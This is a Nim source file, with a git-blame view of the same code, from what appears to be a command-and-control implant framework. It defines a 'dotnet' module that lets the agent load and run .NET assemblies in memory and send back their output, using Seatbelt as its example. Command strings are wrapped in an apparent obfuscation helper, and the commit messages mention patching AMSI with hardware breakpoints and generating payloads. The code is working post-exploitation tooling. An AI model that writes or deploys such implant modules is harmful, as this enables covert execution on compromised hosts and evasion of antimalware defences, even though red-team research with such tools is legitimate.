src/modules/dotnet.nim

import ../common/[types, utils]

# Define function prototype
proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult 

# Module definition
let module* = Module(
    name: protect("dotnet"), 
    description: protect("Load and execute .NET assemblies in memory."),
    moduleType: MODULE_DOTNET,
    commands: @[
        Command(
            name: protect("dotnet"),
            commandType: CMD_DOTNET,
            description: protect("Execute a .NET assembly in memory and retrieve the output."),
            example: protect("dotnet /path/to/Seatbelt.exe antivirus"),
            arguments: @[
                Argument(name: protect("path"), description: protect("Path to the .NET assembly file to execute."), argumentType: BINARY, isRequired: true),
                Argument(name: protect("arguments"), description: protect("Arguments to be passed to the assembly. Arguments are handled as STRING"), argumentType: STRING, isRequired: false)
            ],
            execute: executeAssembly
        )
    ]
)

# Implement execution functions
when not defined(agent):
    proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult = nil

when defined(agent):

    import strutils, strformat
    import ../agent/core/[clr, io]
    import ../agent/protocol/result
    import ../common/[utils, serialize]
    
    proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult = 
        try: 
            var 
                assembly: seq[byte] 
                arguments: seq[string]

            # Parse arguments 
            case int(task.argCount): 
            of 1: # Only the assembly has been passed as an argument
                assembly = task.args[0].data
                arguments = @[]
            else: # Parameters were passed to the BOF execution
                assembly = task.args[0].data
                for arg in task.args[1..^1]: 
                    arguments.add(Bytes.toString(arg.data))
            
            # Unpacking assembly file, since it contains the file name too.
            var unpacker = Unpacker.init(Bytes.toString(assembly))
            let 
                fileName = unpacker.getDataWithLengthPrefix()
                assemblyBytes = unpacker.getDataWithLengthPrefix()

            print fmt"   [>] Executing .NET assembly {fileName}."
            let (assemblyInfo, output) = dotnetInlineExecuteGetOutput(string.toBytes(assemblyBytes), arguments)

            if output != "":
                return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(assemblyInfo & "\n" & output))
            else: 
                return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
Implemented 'dotnet' command for execute-assembly functionality. Patched AMSI using HWBP 2025-09-13 11:47:19 +02:00			`import ../common/[types, utils]`

			`# Define function prototype`
			`proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult`

Reworked module system. Modules can now be individually set to be included in the agent. For example, it is possible to compile an agent only capable of executing BOFs and nothing else. 2025-09-17 15:55:13 +02:00			`# Module definition`
			`let module* = Module(`
			`name: protect("dotnet"),`
			`description: protect("Load and execute .NET assemblies in memory."),`
Improved module selection in payload generation modal with tooltips from the module manager. 2025-09-27 12:36:59 +02:00			`moduleType: MODULE_DOTNET,`
Reworked module system. Modules can now be individually set to be included in the agent. For example, it is possible to compile an agent only capable of executing BOFs and nothing else. 2025-09-17 15:55:13 +02:00			`commands: @[`
			`Command(`
			`name: protect("dotnet"),`
			`commandType: CMD_DOTNET,`
			`description: protect("Execute a .NET assembly in memory and retrieve the output."),`
			`example: protect("dotnet /path/to/Seatbelt.exe antivirus"),`
			`arguments: @[`
			`Argument(name: protect("path"), description: protect("Path to the .NET assembly file to execute."), argumentType: BINARY, isRequired: true),`
			`Argument(name: protect("arguments"), description: protect("Arguments to be passed to the assembly. Arguments are handled as STRING"), argumentType: STRING, isRequired: false)`
			`],`
			`execute: executeAssembly`
			`)`
			`]`
			`)`
Implemented 'dotnet' command for execute-assembly functionality. Patched AMSI using HWBP 2025-09-13 11:47:19 +02:00
			`# Implement execution functions`
Improved module selection in payload generation modal with tooltips from the module manager. 2025-09-27 12:36:59 +02:00			`when not defined(agent):`
Implemented 'dotnet' command for execute-assembly functionality. Patched AMSI using HWBP 2025-09-13 11:47:19 +02:00			`proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult = nil`

			`when defined(agent):`

			`import strutils, strformat`
Implemented setting for verbose mode that prints debug messages in the windows where the agent is executed. Setting "verbose" to false disables all console output of the agent program. 2025-10-20 22:08:06 +02:00			`import ../agent/core/[clr, io]`
Implemented 'dotnet' command for execute-assembly functionality. Patched AMSI using HWBP 2025-09-13 11:47:19 +02:00			`import ../agent/protocol/result`
			`import ../common/[utils, serialize]`

			`proc executeAssembly(ctx: AgentCtx, task: Task): TaskResult =`
			`try:`
			`var`
			`assembly: seq[byte]`
			`arguments: seq[string]`

			`# Parse arguments`
			`case int(task.argCount):`
			`of 1: # Only the assembly has been passed as an argument`
			`assembly = task.args[0].data`
			`arguments = @[]`
			`else: # Parameters were passed to the BOF execution`
			`assembly = task.args[0].data`
			`for arg in task.args[1..^1]:`
			`arguments.add(Bytes.toString(arg.data))`

			`# Unpacking assembly file, since it contains the file name too.`
			`var unpacker = Unpacker.init(Bytes.toString(assembly))`
			`let`
			`fileName = unpacker.getDataWithLengthPrefix()`
			`assemblyBytes = unpacker.getDataWithLengthPrefix()`

Implemented setting for verbose mode that prints debug messages in the windows where the agent is executed. Setting "verbose" to false disables all console output of the agent program. 2025-10-20 22:08:06 +02:00			`print fmt" [>] Executing .NET assembly {fileName}."`
Implemented 'dotnet' command for execute-assembly functionality. Patched AMSI using HWBP 2025-09-13 11:47:19 +02:00			`let (assemblyInfo, output) = dotnetInlineExecuteGetOutput(string.toBytes(assemblyBytes), arguments)`

			`if output != "":`
			`return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(assemblyInfo & "\n" & output))`
			`else:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])`

			`except CatchableError as err:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))`